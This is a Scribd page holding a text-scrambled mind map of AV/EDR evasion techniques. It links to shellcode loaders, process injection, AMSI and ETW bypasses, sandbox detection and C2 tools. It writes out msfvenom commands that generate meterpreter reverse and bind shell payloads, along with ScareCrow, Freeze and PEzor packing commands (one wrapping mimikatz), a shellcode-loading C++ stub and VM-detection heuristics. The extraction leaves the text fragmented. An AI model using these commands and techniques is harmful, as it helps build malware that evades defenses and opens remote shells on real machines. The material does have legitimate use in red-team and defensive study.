Scribd
Upload
197 views1 page

Advanced AV/EDR Evasion Techniques

The document contains links to various articles about bypassing antivirus and security protections through techniques like packing, polymorphism, signature hiding, return-oriented programming, bypassing Control Flow Guard on Windows 10, and injecting code using asynchronous procedure calls and NtQueueApcThreadEx gadgets.

Uploaded by

lczancanella
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
197 views1 page

Advanced AV/EDR Evasion Techniques

The document contains links to various articles about bypassing antivirus and security protections through techniques like packing, polymorphism, signature hiding, return-oriented programming, bypassing Control Flow Guard on Windows 10, and injecting code using asynchronous procedure calls and NtQueueApcThreadEx gadgets.

Uploaded by

lczancanella
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

‎with suspended

‎Packing ‎https://pentester.blog/?p=39 ‎CRT


‎ ttps://damonmohammadbagher.medium.com/
h
‎bypassing-anti-virus-by-creating-remote-thread-
‎Polymorph ‎https://www.exploit-db.com/papers/13874
‎into-target-process-45f145b2ac7a

‎ ttps://www.ired.team/offensive-security/
h
‎Signature hiding ‎defense-evasion/av-bypass-with-metasploit- ‎ ttps://subscription.packtpub.com/book/
h
‎templates ‎security/9781789610789/8/ch08lvl1sec50/
‎executing-the-inject-code-using-apc-queuing
‎ ttps://improsec.com/tech-blog/bypassing-
h
‎ROP
‎control-flow-guard-on-windows-10-part-ii ‎ ttps://github.com/LloydLabs/
h
‎APC (Asyncronous Procedure Call)
‎ntqueueapcthreadex-ntdll-gadget-injection
‎ ttps://joshpitts.medium.com/hooking-control-
h
‎flow-guard-cfg-for-fun-and-profit- ‎ ttps://decoded.avast.io/janvojtesek/raspberry-
h
‎31f951485545 ‎robins-roshtyak-a-little-lesson-in-trickery/
‎CFG
‎ ttps://citeseerx.ist.psu.edu/document?repid=
h
‎rep1&type=pdf&doi= ‎ ttps://www.ired.team/offensive-security/code-
h
‎ade1cc22ee994c1b353326ae4cedccd29f33b8d ‎injection-process-injection/process-hollowing-
‎0 ‎and-pe-image-relocations#relocation
‎Static ‎Process hollowing
‎CFG flattening ‎http://ac.inf.elte.hu/Vol_030_2009/003.pdf ‎ ttps://sevrosecurity.com/2020/04/08/
h
‎process-injection-part-1-createremotethread/
‎Pro tips : A shellcode sent in 3 open sources
‎ ttps://learn.microsoft.com/en-us/dotnet/
h
‎packer will have more chance to be caught than
‎Change logo/icon ‎csharp/language-reference/compiler-options/
‎a manual obfuscation ‎ ttps://attack.mitre.org/techniques/T1055/
h
‎resources?redirectedfrom=MSDN ‎Thread execution hijacking
‎003/

‎Change date of compilation


‎PSC (Ptrace System Calls)
‎https://github.com/TheD1rkMtr/D1rkLrd
‎ ttps://rastamouse.me/memory-patching-amsi-
h
‎bypass/
‎https://github.com/xuanxuan0/DripLoader ‎ ttps://thehackernews.com/2017/12/malware-
h
‎C++ ‎Process Doppelganging
‎ ttps://www.mdsec.co.uk/2018/06/exploring-
h ‎process-doppelganging.html
‎https://github.com/Hagrid29/PELoader ‎Bypass AMSI
‎powershell-amsi-and-logging-evasion/

‎https://github.com/vic4key/QLoader ‎ ttps://disman.tl/2015/01/30/an-improved-
h
‎ ttps://www.pentestpartners.com/security-
h ‎Reflective dll injection
‎reflective-dll-injection-technique.html
‎blog/patchless-amsi-bypass-using-sharpblock/
‎python ‎https://github.com/icyguider/Shhhloader ‎https://github.com/fancycode/MemoryModule
‎Description


‎https://github.com/cribdragg3r/Alaris
‎C2 by DNS ‎Dll injection ‎https://www.ired.team/offensive-security/code-
‎injection-process-injection/dll-injection
‎C ‎https://github.com/trustedsec/COFFLoader
‎Network ‎P2P (hide ip from C2)
‎ ttps://book.hacktricks.xyz/windows-
h
‎ ttps://github.com/CMEPW/Selha/blob/main/
h ‎DLL Sideloading & Proxying ‎hardening/windows-av-bypass#dll-sideloading-
‎C/aes-loader-stageless.c ‎HTTPS
‎and-proxying
‎ ttps://medium.com/@merasor07/av-edr-
h
‎https://github.com/aeverj/NimShellCodeLoader ‎evasion-using-direct-system-calls-user-mode- ‎ ou put your region in RW, you write your
Y
‎Nim ‎vs-kernel-mode-fad2fdfed01a ‎shellcode, then you reprotect in RX, then you
‎Direct syscalls ‎RWX
‎ ttps://github.com/sh3d0ww01f/nim_
h ‎run the thread. This way your region is never in
‎shellloader ‎https://thewover.github.io/Dynamic-Invoke/ ‎rwx

‎ ttps://www.purpl3f0xsecur1ty.tech/2021/03/
h
‎https://github.com/EddieIvan01/gld ‎WaitForSingleObjectEx
‎30/av_evasion.html ‎ ttps://www.mdsec.co.uk/2022/04/process-
h
‎Go ‎dynamic ‎injection-via-component-object-model-com-
‎https://github.com/zha0gongz1/DesertFox ‎Foliage ‎irundowndocallback/
‎COM Hijack ‎Dll
‎https://evasions.checkpoint.com/techniques/
‎Delayed execution ‎https://0xpat.github.io/Abusing_COM_Objects/
‎ small sleep obfuscation technique that uses
A ‎timing.html#delayed-execution
‎https://github.com/b1tg/rs_shellcode ‎Ekko
‎CreateTimerQueueTimer Win32 API ‎Exe
‎ ttps://github.com/S4ntiagoP/donut/tree/
h
‎Rust ‎https://github.com/r4ime/shellcode_loader ‎ ttps://www.cyberbit.com/blog/endpoint-
h ‎syscalls
‎ ttps://github.com/janoglezcampos/
h
‎Deathsleep ‎Remote thread ‎security/malware-mitigation-when-direct- ‎Hta
‎DeathSleep
‎https://github.com/cr7pt0pl4gu3/Pestilence ‎system-calls-are-used/
‎ https://blog.securityevaluators.com/creating-
< ‎ ttps://github.com/hasherezade/pe_to_
h
‎C++ ‎ ttps://www.mdsec.co.uk/2020/03/hiding-
h
‎av-resistant-malware-part-1-7604b83ea0c0 ‎Disable ETW ‎shellcode ‎Cpl
‎ ttps://github.com/js-on/WeaponizeCrystal/
h ‎your-net-etw/ ‎ ttps://www.cyberbit.com/endpoint-security/
h
‎Crystal ‎blob/main/shellcode_loader/shellcode_loader. ‎User APC ‎malware-mitigation-when-direct-system-calls-
‎C ‎https://github.com/reveng007/ReflectiveNtdll ‎cr ‎DInvoke ‎https://github.com/TheWover/DInvoke ‎are-used/ ‎https://github.com/monoxgas/sRDI ‎Link

‎Bypass AV/EDR ‎Dropper ‎Manual loader ‎Automatic loader ‎Generate shellcode ‎Manual obfuscation ‎Automatic obfuscation ‎Process injection ‎Detect virtual machines (Sandbox) ‎From PE to shellcode ‎From alive beacon ‎Extensions

‎ include <iostream>
# ‎ sfvenom -p windows/x64/meterpreter/
m ‎https://github.com/sevagas/macro_pack ‎Count processus number ‎if >=40 its probably not a VM ‎Havoc ‎dotnet (object file)
‎#include <Windows.h> ‎reverse_tcp LHOST=<SERVER> LPORT=< ‎Office macro
‎ ‎PORT> -f raw ‎https://github.com/optiv/Ivy ‎User interaction ‎Send MessageBoxW
‎int main(void) { ‎From .net to BoF ‎https://github.com/CCob/BOF.NET
.‎ 1 allocating memory
‎.2 moving shellcode into that memory ‎ HMODULE hMod = LoadLibrary("shellcode. ‎ sfvenom -p windows/meterpreter/reverse_
m ‎https://github.com/phra/PEzor ‎Software ‎Check for internet ‎Cobalt ‎BoF (Beacon object file)
‎dll"); ‎msfvenom ‎tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt- ‎ ttps://github.com/trustedsec/CS-Situational-
h
‎.3 executing the shellcode ‎C
‎ if (hMod == nullptr) { ‎key thisisakey -f dll ‎Awareness-BOF
‎https://github.com/klezVirus/inceptor ‎Datetime on compilation
‎ cout << "Failed to load shellcode.dll" << endl;
‎} ‎ sfvenom -p windows/meterpreter/bind_tcp -e
m ‎Packing ‎https://github.com/govolution/avet ‎Check for Computer name ‎VM = DESKTOP-[0-9A-Z]{7}
‎ ‎x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.
‎ return 0; ‎68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more ‎https://github.com/Nariod/RustPacker
‎} ‎ ttps://github.com/CMEPW/bof-collection/
h
‎CPUID timing
‎blob/main/src/checkVM/checkVM2.c
‎C2 (Cobalt/Havoc what ever) ‎ ttps://github.com/DavidBuchanan314/
h
‎@Jenaye_fr  ‎ ttps://medium.com/securebit/bypassing-av-
h ‎monomorph ‎Hardware
‎ ypical user workstation has a processor with
T
‎through-metasploit-loader-64-bit-
‎LeDocteurDesBits ‎at least 2 cores, a minimum of 2 GB of RAM
‎9abe55e3e0c8 ‎ ttps://nytrosecurity.com/2019/06/30/writing-
h ‎https://github.com/upx/upx
‎C++ ‎ASM ‎and a 100 GB hard drive
‎Crédits ‎shellcodes-for-windows-x64/
‎michmich1000  ‎ ttps://github.com/ReversingID/Shellcode-
h ‎https://github.com/EgeBalci/sgn/
‎Loader/tree/master/windows ‎ ttps://evasions.checkpoint.com/techniques/
h
‎@Zabannn ‎ ine hyperion.exe /root/payloads/shellter/
w ‎OSX
‎Hyperion ‎https://github.com/CCob/SharpBlock ‎macos.html#macos-sandbox-methods
‎shellter_putty_reverse_x86.exe
‎ ttps://sevrosecurity.com/2019/05/25/bypass-
h
‎.NET ‎ ttps://github.com/danielbohannon/Invoke-
h
‎windows-defender-with-a-simple-shell-loader/ ‎Tools ‎https://github.com/a0rtega/pafish
‎ ttps://vxug.fakedoma.in/papers/VXUG/
h ‎Obfuscation
‎Static ‎AMSI Bypass
‎Exclusive/
‎C
‎FromaCprojectthroughassemblytoshellcodeHas ‎https://github.com/klezVirus/Chameleon
‎herezade.pdf
‎ taged and stageless
S ‎https://github.com/tokyoneon/Chimera
‎By definition, when we talk about staged we are
‎referring to a payload in addition to a piece This ‎ careCrow -I /Path/To/ShellCode -d facebook.
S
‎https://github.com/optiv/ScareCrow
‎means that there will be several actions (often ‎com
‎2) between the client and the server. ‎Signature hiding
‎ ‎https://github.com/paranoidninja/CarbonCopy
‎If you use meterpreter, please use the following
‎commands ‎ ttps://gist.github.com/snovvcrash/
h
‎ ‎LOLBIN ‎RemComSvc
‎123945e8f06c7182769846265637fedb
‎set EnableStageEncoding true;
‎set StageEncoder x64/xor_dynamic; ‎Entropy ‎https://github.com/kleiton0x00/Shelltropy

‎https://github.com/optiv/ScareCrow

‎ ttps://gist.github.com/tandasat/
h
‎e595c77c52e13aaee60e1e8b65d2ba32
‎Disable ETW

‎https://github.com/Soledge/BlockEtw

‎https://github.com/CCob/SharpBlock

‎ reeze -I /PathToShellcode -encrypt -sandbox -


F
‎https://github.com/optiv/Freeze
‎o packed.exe

‎ Ezor.sh -sgn -unhook -antidebug -text -


P
‎https://github.com/phra/PEzor ‎syscalls -sleep=120 mimikatz/x64/mimikatz.
‎exe -z 2
‎Dynamic ‎Indirect syscall
‎https://github.com/optiv/ScareCrow

‎https://github.com/klezVirus/SysWhispers3

‎https://github.com/jthuraisamy/SysWhispers2

‎Disable AV ‎https://github.com/APTortellini/unDefender

‎Block DLL ‎https://github.com/CCob/SharpBlock

‎Detect virtual machines ‎https://github.com/a0rtega/pafish

You might also like